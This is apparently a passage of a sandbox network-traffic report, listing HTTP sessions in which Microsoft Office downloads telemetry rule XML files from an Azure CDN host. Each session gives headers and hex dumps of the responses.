                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            115192.168.2.44973313.107.246.45443984C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:44 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:44 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:44 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1389
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                                                                                            x-ms-request-id: 138d657c-101e-0034-4308-3696ff000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120244Z-1749fc9bdbdmg6wshC1DFWu2bc00000002k0000000006tqw
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:44 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            116192.168.2.44973413.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:44 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:44 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:44 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1352
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                                                                                            x-ms-request-id: 40dd3742-a01e-0002-350c-365074000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120244Z-1749fc9bdbdnkwnnhC1DFWud0400000002dg00000000729d
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:44 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            117192.168.2.44973513.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:44 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:44 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:44 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1405
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE12B5C71"
                                                                                                                                                                                                                                            x-ms-request-id: 6b9ee1ab-f01e-0071-4fa1-34431c000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120244Z-1749fc9bdbdr6qwphC1DFW0nv400000002p00000000027h0
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:44 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            118192.168.2.45257113.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:44 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:44 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:44 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1368
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BDDC22447"
                                                                                                                                                                                                                                            x-ms-request-id: ddaecdfb-101e-0079-21d2-2c5913000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120244Z-16547b76f7fkcrm9hC1DFWxdag0000000km000000000fncu
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:44 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            119192.168.2.42879013.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:44 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:44 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:44 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1401
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE055B528"
                                                                                                                                                                                                                                            x-ms-request-id: 21399fcf-c01e-008e-25a8-347381000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120244Z-r178fb8d765cgqv6hC1DFWsdr400000002m00000000020vs
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:44 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            120192.168.2.44973913.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:44 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:45 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:45 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1364
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE1223606"
                                                                                                                                                                                                                                            x-ms-request-id: 98909b4d-d01e-002b-39d2-2c25fb000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120244Z-16547b76f7fxsvjdhC1DFWprrs0000000kg0000000008rny
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:45 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            121192.168.2.45711013.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:45 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:45 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:45 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1397
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE7262739"
                                                                                                                                                                                                                                            x-ms-request-id: 2ce7ce6f-901e-002a-1fd2-2c7a27000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120245Z-16547b76f7ftdm8dhC1DFWs13g0000000kn00000000046bs
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:45 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            122192.168.2.44974213.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:45 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:45 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:45 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1403
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BDCB4853F"
                                                                                                                                                                                                                                            x-ms-request-id: 4630a231-e01e-0020-14ff-2bde90000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120245Z-16547b76f7f9bs6dhC1DFWt3rg0000000kk0000000009qr0
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:45 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            123192.168.2.43910913.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:45 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:45 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:45 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1366
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BDB779FC3"
                                                                                                                                                                                                                                            x-ms-request-id: fe4e74db-301e-003f-25bc-2c266f000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120245Z-16547b76f7fkj7j4hC1DFW0a9g0000000kkg000000007yff
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:45 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
